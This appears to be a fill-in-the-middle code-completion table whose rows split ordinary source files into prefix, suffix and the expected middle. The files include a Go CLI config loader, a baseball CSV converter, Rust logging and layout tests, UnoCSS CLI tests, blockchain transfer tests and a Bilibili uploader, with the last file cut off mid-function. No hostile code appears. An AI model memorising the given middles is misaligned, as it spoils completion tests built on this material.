file_name | prefix | suffix | middle
---|---|---|---|
root.go | /*
Copyright © 2021 NAME HERE <EMAIL ADDRESS>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package root
import (
"encoding/json"
"fmt"
"io/ioutil"
"log"
"os"
"github.com/gmeghnag/omc/cmd"
"github.com/gmeghnag/omc/cmd/describe"
"github.com/gmeghnag/omc/cmd/etcd"
"github.com/gmeghnag/omc/cmd/get"
"github.com/gmeghnag/omc/cmd/helpers"
"github.com/gmeghnag/omc/cmd/logs"
"github.com/gmeghnag/omc/types"
"github.com/gmeghnag/omc/vars"
"github.com/spf13/cobra"
"github.com/spf13/viper"
)
// RootCmd represents the base command when called without any subcommands
var RootCmd = &cobra.Command{ // FLOW 4
Use: "omc",
Run: func(cmd *cobra.Command, args []string) { fmt.Println("Hello from omc CLI. :]") },
}
// Execute adds all child commands to the root command and sets flags appropriately.
// This is called by main.main(). It only needs to happen once to the RootCmd.
func Execute() {
cobra.CheckErr(RootCmd.Execute())
}
func init() { |
// initConfig reads in config file and ENV variables if set.
func initConfig() {
// fmt.Println("inside initConfig") FLOW 1
if vars.CfgFile != "" {
// Use config file from the flag.
viper.SetConfigFile(vars.CfgFile)
} else {
// Find home directory.
home, err := os.UserHomeDir()
cobra.CheckErr(err)
exist, _ := helpers.Exists(home + "/.omc.json")
if !exist {
config := types.Config{}
file, _ := json.MarshalIndent(config, "", " ")
_ = ioutil.WriteFile(home+"/.omc.json", file, 0644) // vars.CfgFile is empty in this branch, so write the default config to $HOME/.omc.json
}
// Search config in home directory with name ".omc" (without extension).
viper.AddConfigPath(home)
viper.SetConfigType("json")
viper.SetConfigName(".omc")
}
viper.AutomaticEnv() // read in environment variables that match
// If a config file is found, read it in.
if err := viper.ReadInConfig(); err == nil {
//fmt.Fprintln(os.Stderr, "Using config file:", viper.ConfigFileUsed())
omcConfigJson := types.Config{}
file, _ := ioutil.ReadFile(viper.ConfigFileUsed())
_ = json.Unmarshal([]byte(file), &omcConfigJson)
var contexts []types.Context
contexts = omcConfigJson.Contexts
for _, context := range contexts {
if context.Current == "*" {
vars.MustGatherRootPath = context.Path
if vars.Namespace == "" {
vars.Namespace = context.Project
}
break
}
}
if vars.MustGatherRootPath != "" {
exist, _ := helpers.Exists(vars.MustGatherRootPath + "/namespaces")
if !exist {
files, err := ioutil.ReadDir(vars.MustGatherRootPath)
if err != nil {
log.Fatal(err)
}
baseDir := ""
for _, f := range files {
if f.IsDir() {
baseDir = f.Name()
vars.MustGatherRootPath = vars.MustGatherRootPath + "/" + baseDir
break
}
}
if baseDir == "" {
fmt.Println("Some error occurred, wrong must-gather file composition")
os.Exit(1)
}
}
}
} else {
homePath, _ := os.UserHomeDir()
helpers.CreateConfigFile(homePath)
// TODO create the config file
}
}
|
//fmt.Println("inside init") //FLOW 0
cobra.OnInitialize(initConfig)
// Here you will define your flags and configuration settings.
// Cobra supports persistent flags, which, if defined here,
// will be global for your application.
RootCmd.PersistentFlags().StringVar(&vars.CfgFile, "config", "", "Config file to use (default is $HOME/.omc.json).")
RootCmd.PersistentFlags().StringVarP(&vars.Namespace, "namespace", "n", "", "If present, list the requested object(s) for a specific namespace.")
// Cobra also supports local flags, which will only run
// when this action is called directly.
RootCmd.AddCommand(
cmd.VersionCmd,
cmd.DeleteCmd,
cmd.ProjectCmd,
cmd.UseCmd,
get.GetCmd,
describe.DescribeCmd,
etcd.Etcd,
logs.Logs,
)
}
|
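The `initConfig` logic above boils down to two steps: pick the context marked current (`*`) from `~/.omc.json`, then fall back to the first subdirectory when `<path>/namespaces` is missing. A rough Python sketch of the same idea, assuming lowercase JSON keys (`contexts`, `current`, `path`, `project` — the real key names depend on the `types.Config` struct tags):

```python
import json
import os

def resolve_context(config_path):
    """Pick the context marked current ("*") and normalize the must-gather root."""
    with open(config_path) as f:
        cfg = json.load(f)
    root, namespace = "", ""
    for ctx in cfg.get("contexts", []):
        if ctx.get("current") == "*":
            root, namespace = ctx.get("path", ""), ctx.get("project", "")
            break
    # Mirror the fallback in initConfig: if <root>/namespaces is missing,
    # descend into the first subdirectory of the must-gather root.
    if root and not os.path.isdir(os.path.join(root, "namespaces")):
        subdirs = [d for d in sorted(os.listdir(root)) if os.path.isdir(os.path.join(root, d))]
        if not subdirs:
            raise RuntimeError("unexpected must-gather layout: no subdirectory found")
        root = os.path.join(root, subdirs[0])
    return root, namespace
```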
convert_game.py | import csv
import json
def read_data_file(filename):
all_records = []
with open(filename, mode='r') as csv_file:
csv_reader = csv.reader(csv_file)
row_count = 0
for row in csv_reader:
all_records.append(row)
return all_records
def parse_play_fields(play_fields):
plays = []
for p in play_fields: | temp["inning_number"] = int(p[1])
temp["home_field_indicator"] = int(p[2])
temp["player_code"] = p[3]
temp["count_at_action"] = p[4]
temp["all_pitches"] = p[5]
temp["play_events"] = p[6]
plays.append(temp)
return plays
def parse_sub_fields(sub_fields):
subs = []
for s in sub_fields:
temp = {}
temp["event_count"] = int(s[0])
temp["player_code"] = s[1]
temp["name"] = s[2]
temp["home_field_indicator"] = int(s[3])
temp["batting_order"] = int(s[4])
temp["field_position"] = int(s[5])
subs.append(temp)
return subs
def parse_info_fields(info_fields):
infos = []
for i in info_fields:
temp = {}
temp[i[0]] = i[1]
infos.append(temp)
return infos
def parse_start_fields(start_fields):
starts = []
for s in start_fields:
temp = {}
temp["player_code"] = s[0]
temp["name"] = s[1]
temp["home_field_indicator"] = int(s[2])
temp["batting_order"] = int(s[3])
temp["field_position"] = int(s[4])
starts.append(temp)
return starts
def parse_data_fields(data_fields):
datas = []
for d in data_fields:
temp = {}
temp["type"] = d[0]
temp["player_code"] = d[1]
temp["earned_runs"] = int(d[2])
datas.append(temp)
return datas
def get_fields(records):
id = ""
version = ""
play = []
info = []
start = []
data = []
sub = []
event_count = 0
for r in records:
if r[0] == "play":
r[0] = event_count
event_count += 1
play.append(r)
elif r[0] == "info":
info.append(r[1:])
elif r[0] == "start":
start.append(r[1:])
elif r[0] == "data":
data.append(r[1:])
elif r[0] == "sub":
r[0] = event_count
event_count += 1
sub.append(r)
elif r[0] == "com":
continue # This one we should ignore
elif r[0].endswith("adj"):
continue # This one we should ignore
elif r[0] == "id":
id = r[1]
elif r[0] == "version":
version = r[1]
else:
print("ERROR")
print(r)
return id, version, play, info, start, data, sub
def get_game(game_records):
id, version, plays, infos, starts, datas, subs = get_fields(game_records)
play_list = parse_play_fields(plays)
info_list = parse_info_fields(infos)
start_list = parse_start_fields(starts)
data_list = parse_data_fields(datas)
sub_list = parse_sub_fields(subs)
game = {}
game["id"] = id
game["version"] = version
game["plays"] = play_list
game["info"] = info_list
game["start"] = start_list
game["data"] = data_list
game["subs"] = sub_list
return game
def get_all_games(all_game_records):
all_games = []
for g in all_game_records:
all_games.append(get_game(g))
return json.dumps(all_games)
# path = "./../storage/ANA201808100.in"
# game_records = read_data_file(path)
# game = get_game(game_records)
#
# print(game["id"]) | temp = {}
temp["event_count"] = int(p[0]) |
logging.rs | use fern::colors::{Color, ColoredLevelConfig};
use log::debug;
pub fn set_up_logging(name: &'static str) | {
// configure colors for the whole line
let colors_line = ColoredLevelConfig::new()
.error(Color::Red)
.warn(Color::Yellow)
// we actually don't need to specify the color for debug and info, they are white by default
.info(Color::White)
.debug(Color::White)
// depending on the terminals color scheme, this is the same as the background color
.trace(Color::BrightBlack);
// configure colors for the name of the level.
// since almost all of them are the same as the color for the whole line, we
// just clone `colors_line` and overwrite our changes
let colors_level = colors_line.clone().info(Color::Green);
// here we set up our fern Dispatch
fern::Dispatch::new()
.format(move |out, message, record| {
out.finish(format_args!(
"{color_line}[{level}{color_line}] {message}\x1B[0m",
color_line = format_args!(
"\x1B[{}m",
colors_line.get_color(&record.level()).to_fg_str()
),
level = colors_level.color(record.level()),
message = message,
));
})
// set the default log level. to filter out verbose log messages from dependencies, set
// this to Warn and overwrite the log level for your crate.
// .level(log::LevelFilter::Debug)
.level(log::LevelFilter::Warn)
// change log levels for individual modules. Note: This looks for the record's target
// field which defaults to the module path but can be overwritten with the `target`
// parameter:
// `info!(target="special_target", "This log message is about special_target");`
.level_for(name, log::LevelFilter::Debug)
// .level_for("dioxus", log::LevelFilter::Info)
// .level_for("pretty_colored", log::LevelFilter::Trace)
// output to stdout
.chain(std::io::stdout())
.apply()
.unwrap();
debug!("finished setting up logging! yay!");
} |
|
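The fern formatter above wraps each line in ANSI escape sequences: `\x1B[<n>m` switches the foreground color and `\x1B[0m` resets it. A tiny Python illustration of the same escape-code idea, independent of fern (the numeric codes are standard ANSI, not taken from the Rust code):

```python
RED, YELLOW, RESET = "\x1b[31m", "\x1b[33m", "\x1b[0m"

def colored(level, message):
    # Pick a color for the level, print the message, then reset the terminal color.
    color = {"ERROR": RED, "WARN": YELLOW}.get(level, "")
    return f"{color}[{level}]{RESET} {message}"

print(colored("ERROR", "something went wrong"))
print(colored("WARN", "disk almost full"))
```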
cli.test.ts | import { resolve } from 'path'
import fs from 'fs-extra'
import { afterAll, beforeAll, describe, expect, it } from 'vitest'
import { startCli } from '../packages/cli/src/cli-start'
export const tempDir = resolve('.temp')
export const cli = resolve(__dirname, '../packages/cli/src/cli.ts')
beforeAll(async () => {
await fs.remove(tempDir)
})
afterAll(async () => {
await fs.remove(tempDir)
})
describe('cli', () => {
it('builds uno.css', async () => {
const { output } = await runCli({
'views/index.html': '<div class="p-4 max-w-screen-md"></div>',
})
expect(output).toMatchSnapshot()
})
it('supports unocss.config.js', async () => {
const { output } = await runCli({
'views/index.html': '<div class="box"></div>',
'unocss.config.js': `
import { defineConfig } from 'unocss'
export default defineConfig({
shortcuts: [{ box: 'max-w-7xl mx-auto bg-gray-100 rounded-md shadow-sm p-4' }]
})
`.trim(),
})
expect(output).toMatchSnapshot()
})
it('uno.css exclude initialized class after changing file', async () => {
const fileName = 'views/index.html'
const initializedContent = '<div class="bg-blue"></div>'
const changedContent = '<div class="bg-red"></div>'
const testDir = getTestDir()
const absolutePathOfFile = resolve(testDir, fileName)
await fs.outputFile(absolutePathOfFile, initializedContent)
runAsyncChildProcess(testDir, './views/**/*', '-w')
const outputPath = resolve(testDir, 'uno.css')
for (let i = 50; i >= 0; i--) {
await sleep(50)
if (fs.existsSync(outputPath))
break
}
await fs.writeFile(absolutePathOfFile, changedContent)
// polling until update
for (let i = 50; i >= 0; i--) {
await sleep(50)
const output = await readUnocssFile(testDir)
if (i === 0 || output.includes('.bg-red'))
expect(output).toContain('.bg-red')
}
})
})
// ----- Utils -----
function sleep(time = 300) {
return new Promise<void>((resolve) => {
setTimeout(() => {
resolve()
}, time)
}) | }
function initOutputFiles(testDir: string, files: Record<string, string>) {
return Promise.all(
Object.entries(files).map(([path, content]) =>
fs.outputFile(resolve(testDir, path), content, 'utf8'),
),
)
}
function runAsyncChildProcess(cwd: string, ...args: string[]) {
return startCli(cwd, ['', '', ...args, '--no-preflights'])
}
function readUnocssFile(testDir: string) {
return fs.readFile(resolve(testDir, 'uno.css'), 'utf8')
}
async function runCli(files: Record<string, string>) {
const testDir = getTestDir()
await initOutputFiles(testDir, files)
await runAsyncChildProcess(testDir, 'views/**/*')
const output = await readUnocssFile(testDir)
return {
output,
}
} | }
function getTestDir() {
return resolve(tempDir, Math.round(Math.random() * 100000).toString()) |
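The watch-mode test above cannot assert immediately after writing the file; it polls `uno.css` with short sleeps until the expected class shows up or the attempts run out. A generic sketch of that poll-until-ready pattern in Python (attempt count and interval are illustrative, not taken from the test):

```python
import time
from pathlib import Path

def wait_for(predicate, attempts=50, interval=0.05):
    """Poll until predicate() is truthy or the attempts run out."""
    for _ in range(attempts):
        if predicate():
            return True
        time.sleep(interval)
    return bool(predicate())

# e.g. wait until a generated CSS file contains the expected rule
css = Path("uno.css")
ready = wait_for(lambda: css.exists() and ".bg-red" in css.read_text())
```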
percent_absolute_position.rs | #[test]
fn percent_absolute_position() | {
let layout = stretch::node::Node::new(
stretch::style::Style {
flex_direction: stretch::style::FlexDirection::Column,
size: stretch::geometry::Size {
width: stretch::style::Dimension::Points(60f32),
height: stretch::style::Dimension::Points(50f32),
..Default::default()
},
..Default::default()
},
vec![&stretch::node::Node::new(
stretch::style::Style {
position_type: stretch::style::PositionType::Absolute,
size: stretch::geometry::Size {
width: stretch::style::Dimension::Percent(1f32),
height: stretch::style::Dimension::Points(50f32),
..Default::default()
},
position: stretch::geometry::Rect {
start: stretch::style::Dimension::Percent(0.5f32),
..Default::default()
},
..Default::default()
},
vec![
&stretch::node::Node::new(
stretch::style::Style {
size: stretch::geometry::Size {
width: stretch::style::Dimension::Percent(1f32),
..Default::default()
},
..Default::default()
},
vec![],
),
&stretch::node::Node::new(
stretch::style::Style {
size: stretch::geometry::Size {
width: stretch::style::Dimension::Percent(1f32),
..Default::default()
},
..Default::default()
},
vec![],
),
],
)],
)
.compute_layout(stretch::geometry::Size::undefined())
.unwrap();
assert_eq!(layout.size.width, 60f32);
assert_eq!(layout.size.height, 50f32);
assert_eq!(layout.location.x, 0f32);
assert_eq!(layout.location.y, 0f32);
assert_eq!(layout.children[0usize].size.width, 60f32);
assert_eq!(layout.children[0usize].size.height, 50f32);
assert_eq!(layout.children[0usize].location.x, 30f32);
assert_eq!(layout.children[0usize].location.y, 0f32);
assert_eq!(layout.children[0usize].children[0usize].size.width, 30f32);
assert_eq!(layout.children[0usize].children[0usize].size.height, 50f32);
assert_eq!(layout.children[0usize].children[0usize].location.x, 0f32);
assert_eq!(layout.children[0usize].children[0usize].location.y, 0f32);
assert_eq!(layout.children[0usize].children[1usize].size.width, 30f32);
assert_eq!(layout.children[0usize].children[1usize].size.height, 50f32);
assert_eq!(layout.children[0usize].children[1usize].location.x, 30f32);
assert_eq!(layout.children[0usize].children[1usize].location.y, 0f32);
} |
|
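The expected numbers in the assertions follow from percentage arithmetic: the absolutely positioned child is 100% of the 60pt-wide parent, its `start: 50%` offset is 30pt, and its two 100%-wide children end up at 30pt each because they shrink to share the 60pt row. A quick plain-Python check that just reproduces those values:

```python
parent_w, parent_h = 60.0, 50.0
child_w = 1.0 * parent_w      # width: 100%  -> 60
child_x = 0.5 * parent_w      # start: 50%   -> 30
grandchild_w = child_w / 2.0  # two 100%-wide items shrink to share the row -> 30 each
print(child_w, child_x, grandchild_w)  # 60.0 30.0 30.0
```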
test_multi_transfer.py | from tester import test_case, Node, NodePoll
import concurrent.futures
|
with Node(env, settings_node_1, logger) as node_1:
node_1.run_check_test()
with Node(env, settings_node_2, logger) as node_2:
node_2.run_check_test()
target_address = node_1.create_new_address(keys_path="keys1")
node_1.run_check_balance(address=target_address, balance=0)
node_2.run_check_balance(address=target_address, balance=0)
distributor_address = node_1.load_address(keys_path=node_1.DISTRIBUTOR_ADDRESS_PATH)
amount = 333
transaction_wait = 5
transaction_timeout = 3
node_2.run_check_transfer(to_address=target_address, amount=amount,
from_address=distributor_address, fee=0, timeout=transaction_timeout, wait=transaction_wait)
node_2.run_check_balance(address=target_address, balance=amount)
node_1.run_check_balance(address=target_address, balance=amount)
return 0
@test_case("multi_transfer_connected_with_everything")
def main(env, logger):
count_nodes = 10
start_sync_port = 20302
start_rpc_port = 50152
waiting_time = 5
transaction_timeout = 5
transaction_wait = 5
with NodePoll() as pool:
pool.append(Node(env, Node.Settings(Node.Id(start_sync_port, start_rpc_port)), logger))
pool.last.start_node(waiting_time)
pool.last.run_check_test()
# initializing connections with nodes
for i in range(1, count_nodes):
current_sync_port = start_sync_port + i
current_rpc_port = start_rpc_port + i
pool.append(
Node(env, Node.Settings(Node.Id(current_sync_port, current_rpc_port), nodes=pool.ids),
logger))
pool.last.start_node(waiting_time)
for node in pool:
node.run_check_test()
addresses = [pool.last.create_new_address(keys_path=f"keys{i}") for i in range(1, len(pool))]
init_amount = 1000
distributor_address = pool.last.load_address(keys_path=Node.DISTRIBUTOR_ADDRESS_PATH)
# init addresses with amount
for to_address in addresses:
pool.last.run_check_balance(address=to_address, balance=0)
pool.last.run_check_transfer(to_address=to_address, amount=init_amount,
from_address=distributor_address, fee=0, timeout=transaction_timeout, wait=transaction_wait)
for node in pool:
node.run_check_balance(address=to_address, balance=init_amount)
for i in range(1, len(addresses) - 1):
from_address = addresses[i]
to_address = addresses[i + 1]
amount = i * 100
pool.last.run_check_transfer(to_address=to_address, amount=amount, from_address=from_address,
fee=0, timeout=transaction_timeout, wait=transaction_wait)
for node in pool:
node.run_check_balance(address=to_address, balance=amount + init_amount)
first_address = addresses[0]
first_address_balance = init_amount
for node in pool:
node.run_check_balance(address=first_address, balance=first_address_balance)
return 0
@test_case("multi_transfer_connected_one_by_one")
def main(env, logger):
count_nodes = 10
start_sync_port = 20310
start_rpc_port = 50160
waiting_time = 5
transaction_timeout = 7
transaction_wait = 4
with NodePoll() as pool:
pool.append(Node(env, Node.Settings(Node.Id(start_sync_port, start_rpc_port)), logger))
pool.last.start_node(waiting_time)
pool.last.run_check_test()
# initializing connections with nodes
for i in range(1, count_nodes):
current_sync_port = start_sync_port + i
current_rpc_port = start_rpc_port + i
pool.append(
Node(env, Node.Settings(Node.Id(current_sync_port, current_rpc_port), nodes=[pool.last.settings.id, ]),
logger))
pool.last.start_node(waiting_time)
for node in pool:
node.run_check_test()
addresses = [pool.last.create_new_address(keys_path=f"keys{i}") for i in range(1, len(pool))]
init_amount = 1000
distributor_address = pool.last.load_address(keys_path=Node.DISTRIBUTOR_ADDRESS_PATH)
# init addresses with amount
for to_address in addresses:
pool.last.run_check_balance(address=to_address, balance=0)
pool.last.run_check_transfer(to_address=to_address, amount=init_amount,
from_address=distributor_address, fee=0, timeout=transaction_timeout,
wait=transaction_wait)
for node in pool:
node.run_check_balance(address=to_address, balance=init_amount)
for i in range(1, len(addresses) - 1):
from_address = addresses[i]
to_address = addresses[i + 1]
amount = i * 100
pool.last.run_check_transfer(to_address=to_address, amount=amount, from_address=from_address,
fee=0, timeout=transaction_timeout,
wait=transaction_wait)
for node in pool:
node.run_check_balance(address=to_address, balance=amount + init_amount)
first_address = addresses[0]
first_address_balance = init_amount
for node in pool:
node.run_check_balance(address=first_address, balance=first_address_balance)
return 0
def node_transfers(node, addresses, transaction_wait):
shift = len(addresses) - 1
pos = 0
from_address = addresses[pos]
amount = 300
transaction_timeout = 40
for _ in range(len(addresses) * 5):
pos = (pos + shift) % len(addresses)
to_address = addresses[pos]
node.run_check_transfer(to_address=to_address, amount=amount, from_address=from_address, fee=0,
timeout=transaction_timeout, wait=transaction_wait)
from_address = to_address
@test_case("parallel_transfer_connected_with_everything")
def main(env, logger):
count_nodes = 7
start_sync_port = 20330
start_rpc_port = 50180
node_startup_time = 5
transaction_wait = 10
transaction_timeout = 42
init_amount = 1000
address_per_nodes = 3
with NodePoll() as pool:
pool.append(Node(env, Node.Settings(Node.Id(start_sync_port, start_rpc_port)), logger))
pool.last.start_node(node_startup_time)
pool.last.run_check_test()
# initializing connections with nodes
for i in range(1, count_nodes):
current_sync_port = start_sync_port + i
current_rpc_port = start_rpc_port + i
pool.append(
Node(env, Node.Settings(Node.Id(current_sync_port, current_rpc_port), nodes=pool.ids),
logger))
pool.last.start_node(node_startup_time)
for node in pool:
node.run_check_test()
addresses = [pool.last.create_new_address(keys_path=f"keys{i}") for i in
range(1, count_nodes * address_per_nodes + 1)]
distributor_address = pool.last.load_address(keys_path=Node.DISTRIBUTOR_ADDRESS_PATH)
# init addresses with amount
for to_address in addresses:
pool.last.run_check_balance(address=to_address, balance=0)
pool.last.run_check_transfer(to_address=to_address, amount=init_amount,
from_address=distributor_address, fee=0, timeout=transaction_timeout,
wait=transaction_wait)
for node in pool:
node.run_check_balance(address=to_address, balance=init_amount)
with concurrent.futures.ThreadPoolExecutor(len(pool)) as executor:
threads = []
for i in range(len(pool)):
first_address_number = i * address_per_nodes
last_address_number = (i * address_per_nodes) + address_per_nodes
threads.append(
executor.submit(node_transfers, pool[i], addresses[first_address_number:last_address_number],
transaction_wait))
for i in threads:
i.result()
for address in addresses:
for node in pool:
node.run_check_balance(address=address, balance=init_amount)
return 0 | @test_case("multi_transfer")
def main(env, logger):
settings_node_1 = Node.Settings(Node.Id(20300, 50150))
settings_node_2 = Node.Settings(Node.Id(20301, 50151), nodes=[settings_node_1.id, ]) |
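Why the parallel test can assert that every address ends back at `init_amount`: `node_transfers` walks a closed cycle over its address slice (the position steps by `len - 1` each time, and the chain starts and ends at the same address), so with zero fees every address receives exactly what it sends. A small stand-alone simulation of that bookkeeping, using the same constants as the test:

```python
def simulate_cycle(n_addresses, rounds=5, amount=300, init_amount=1000):
    balances = [init_amount] * n_addresses
    shift = n_addresses - 1
    pos, sender = 0, 0
    for _ in range(n_addresses * rounds):
        pos = (pos + shift) % n_addresses
        balances[sender] -= amount   # from_address pays
        balances[pos] += amount      # to_address receives
        sender = pos
    return balances

print(simulate_cycle(3))  # [1000, 1000, 1000] -- everyone is back at init_amount
```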
bilibiliuploader.py | from . import core
from .util import cipher
from nonebot import logger
import json
class BilibiliUploader():
def __init__(self):
self.access_token = None
self.refresh_token = None
self.sid = None
self.mid = None
def login(self, username, password):
code, self.access_token, self.refresh_token, self.sid, self.mid, _ = core.login(username, password)
if code != 0: # a non-zero code means the login failed
logger.error("login fail, error code = {}".format(code))
def login_by_access_token(self, access_token, refresh_token=None):
self.access_token = access_token
self.refresh_token = refresh_token
self.sid, self.mid, _ = core.login_by_access_token(access_token)
def login_by_access_token_file(self, file_name):
|
def save_login_data(self, file_name=None):
login_data = json.dumps(
{
"access_token": self.access_token,
"refresh_token": self.refresh_token
}
)
try:
with open(file_name, "w+") as f:
f.write(login_data)
finally:
return login_data
def upload(self,
parts,
copyright: int,
title: str,
tid: int,
tag: str,
desc: str,
source: str = '',
cover: str = '',
no_reprint: int = 0,
open_elec: int = 1,
max_retry: int = 5,
thread_pool_workers: int = 1):
return core.upload(self.access_token,
self.sid,
self.mid,
parts,
copyright,
title,
tid,
tag,
desc,
source,
cover,
no_reprint,
open_elec,
max_retry,
thread_pool_workers)
def edit(self,
avid=None,
bvid=None,
parts=None,
insert_index=None,
copyright=None,
title=None,
tid=None,
tag=None,
desc=None,
source=None,
cover=None,
no_reprint=None,
open_elec=None,
max_retry: int = 5,
thread_pool_workers: int = 1):
if not avid and not bvid:
logger.warning("please provide avid or bvid")
return None, None
if not avid:
avid = cipher.bv2av(bvid)
if not isinstance(parts, list):
parts = [parts]
if type(avid) is str:
avid = int(avid)
core.edit_videos(
self.access_token,
self.sid,
self.mid,
avid,
bvid,
parts,
insert_index,
copyright,
title,
tid,
tag,
desc,
source,
cover,
no_reprint,
open_elec,
max_retry,
thread_pool_workers
)
| with open(file_name, "r") as f:
login_data = json.loads(f.read())
self.access_token = login_data["access_token"]
self.refresh_token = login_data["refresh_token"]
self.sid, self.mid, _ = core.login_by_access_token(self.access_token) |
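A minimal usage sketch for the wrapper above, assuming a token file previously written by `save_login_data`; the metadata values and `parts` are placeholders, and the return value of `core.upload` is passed through untouched:

```python
uploader = BilibiliUploader()
uploader.login_by_access_token_file("bilibili_login.json")  # hypothetical file name

parts = []  # placeholder: video part(s) prepared elsewhere, whatever core.upload expects
result = uploader.upload(
    parts=parts,
    copyright=2,       # placeholder value
    title="demo upload",
    tid=21,            # placeholder category id
    tag="demo",
    desc="uploaded via BilibiliUploader",
)
```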
gen.rs | use std::{
collections::{HashMap, HashSet},
fmt, fs,
path::{Path, PathBuf},
};
#[derive(Clone, Hash, PartialEq, Eq)]
pub struct Package {
raw: String,
escaped: String,
escaped_vec: Vec<String>,
}
impl fmt::Debug for Package {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "\"{}\"", self.raw)
}
}
impl From<&str> for Package {
fn from(v: &str) -> Self {
let vec = v
.split('.')
.map(escape)
.map(ToOwned::to_owned)
.collect::<Vec<_>>();
Self {
raw: v.to_owned(),
escaped: vec.join("."),
escaped_vec: vec,
}
}
}
impl Package {
fn from_escaped_vec(vec: Vec<String>) -> Self {
let raw = vec
.iter()
.map(|v| {
if v.starts_with("r#") {
v.chars().skip(2).collect::<String>()
} else {
v.to_owned()
}
})
.collect::<Vec<_>>()
.join(".");
Self {
raw,
escaped: vec.join("."),
escaped_vec: vec,
}
}
// https://doc.rust-lang.org/cargo/reference/features.html#features
// crates.io requires feature names to only contain ASCII letters, digits, _, or -.
fn feature_name(&self) -> String {
self.raw.split('.').collect::<Vec<_>>().join("-")
}
}
#[derive(Debug, Clone, Hash, PartialEq, Eq)]
pub struct Proto {
path: PathBuf,
package: Package,
imports: Vec<Proto>,
}
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Module {
package: Package,
include: bool,
imported_by: HashSet<Package>,
children: HashMap<String, Module>,
}
impl Module {
fn empty(package: Package) -> Self {
Self {
package,
include: false,
imported_by: HashSet::new(),
children: HashMap::new(),
}
}
}
impl Module {
fn gen_code(&self) -> String {
let include = if self.include {
let mut attr = self
.imported_by
.iter()
.map(|p| p.feature_name())
.collect::<Vec<_>>();
attr.sort();
let attr = attr
.into_iter()
.map(|f| format!(r#"feature = "{}","#, f))
.collect::<String>();
let attr = format!("#[cfg(any({}))]", attr);
format!(
"{attr}\ninclude_proto!(\"{package}\");\n",
attr = attr,
package = self.package.escaped,
)
} else {
String::new()
};
let mut vec = self.children.iter().collect::<Vec<_>>();
vec.sort_by_key(|v| v.0);
let children = vec
.into_iter()
.map(|(k, v)| {
format!(
"pub mod {name} {{ {children} }}\n",
name = k,
children = v.gen_code(),
)
})
.collect::<String>();
format!(
"{include} {children}",
include = include,
children = children
)
}
}
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct RootModule(HashMap<String, Module>);
impl RootModule {
pub fn gen_code(&self) -> String {
let mut vec = self.0.iter().collect::<Vec<_>>();
vec.sort_by_key(|v| v.0);
vec.into_iter()
.map(|(k, v)| {
format!(
"pub mod {name} {{ {children} }}\n",
name = k,
children = v.gen_code(),
)
})
.collect()
}
}
// https://doc.rust-lang.org/reference/keywords.html
fn escape(s: &str) -> &str {
match s {
// Lexer
"as" => "r#as",
"break" => "r#break",
"const" => "r#const",
"continue" => "r#continue",
"crate" => "r#crate",
"else" => "r#else",
"enum" => "r#enum",
"extern" => "r#extern",
"false" => "r#false",
"fn" => "r#fn",
"for" => "r#for",
"if" => "r#if",
"impl" => "r#impl",
"in" => "r#in",
"let" => "r#let",
"loop" => "r#loop",
"match" => "r#match",
"mod" => "r#mod",
"move" => "r#move",
"mut" => "r#mut",
"pub" => "r#pub",
"ref" => "r#ref",
"return" => "r#return",
"self" => "r#self",
"Self" => "r#Self",
"static" => "r#static",
"struct" => "r#struct",
"super" => "r#super",
"trait" => "r#trait",
"true" => "r#true",
"type" => "r#type",
"unsafe" => "r#unsafe",
"use" => "r#use",
"where" => "r#where",
"while" => "r#while",
// Lexer 2018+
"async" => "r#async",
"await" => "r#await",
"dyn" => "r#dyn",
// Reserved keywords
"abstract" => "r#abstract",
"become" => "r#become",
"box" => "r#box",
"do" => "r#do",
"final" => "r#final",
"macro" => "r#macro",
"override" => "r#override",
"priv" => "r#priv",
"typeof" => "r#typeof",
"unsized" => "r#unsized",
"virtual" => "r#virtual",
"yield" => "r#yield",
_ => s,
}
}
// https://developers.google.com/protocol-buffers/docs/reference/proto3-spec#package
// package = "package" fullIdent ";"
fn parse_package(line: &str) -> Option<Package> {
const PACKAGE: &str = "package";
if line.starts_with(PACKAGE) {
let package = line
.chars()
.skip(PACKAGE.len())
.take_while(|&c| c != ';')
.collect::<String>()
.trim()
.to_owned();
Some(package.as_str().into())
} else {
None
}
}
// https://developers.google.com/protocol-buffers/docs/reference/proto3-spec#import_statement
// import = "import" [ "weak" | "public" ] strLit ";"
fn parse_import(line: &str) -> Option<String> {
const IMPORT: &str = "import";
if line.starts_with(IMPORT) {
let import = line
.chars()
.skip(IMPORT.len())
.skip_while(|&c| c != '\'' && c != '"')
.skip(1)
.take_while(|&c| c != '\'' && c != '"') // TODO: Should I check that the closing quote matches the opening one?
.collect::<String>() // TODO: Should I check that the next character is a semicolon?
.trim()
.to_owned();
Some(import)
} else {
None
}
}
pub fn find_proto(root: PathBuf) -> Vec<Proto> {
let mut cache = HashMap::new();
find_proto_rec(root.clone(), root, &mut cache)
}
fn find_proto_rec(
root: PathBuf,
dir: impl AsRef<Path>,
cache: &mut HashMap<PathBuf, Proto>,
) -> Vec<Proto> {
let mut ret = Vec::new();
let cur = fs::read_dir(dir.as_ref())
.unwrap()
.map(Result::unwrap)
.map(|dir| dir.path())
.map(|path| (path.metadata().unwrap(), path))
.collect::<Vec<_>>();
let iter = cur
.clone()
.into_iter()
.filter(|(meta, _)| meta.is_file())
.filter(|(_, path)| path.extension().filter(|ex| ex == &"proto").is_some());
for (_, path) in iter {
let proto = if let Some(proto) = cache.get(&path) {
proto.clone()
} else {
let prot = proto_rec(root.clone(), path.clone(), cache);
cache.insert(path, prot.clone());
prot
};
ret.push(proto);
}
let iter = cur.into_iter().filter(|(meta, _)| meta.is_dir());
for (_, path) in iter {
let mut protos = find_proto_rec(root.clone(), path, cache);
ret.append(&mut protos);
}
ret
}
fn proto_rec(root: PathBuf, path: PathBuf, map: &mut HashMap<PathBuf, Proto>) -> Proto {
let mut package = None;
let mut imports = Vec::new();
for line in fs::read_to_string(path.as_path()).unwrap().lines() {
if let Some(pkg) = parse_package(line) {
package = Some(pkg);
} else if let Some(import) = parse_import(line) {
if !import.starts_with("google/protobuf") {
let mut path = root.clone();
path.push(import);
if let Some(proto) = map.get(path.as_path()) {
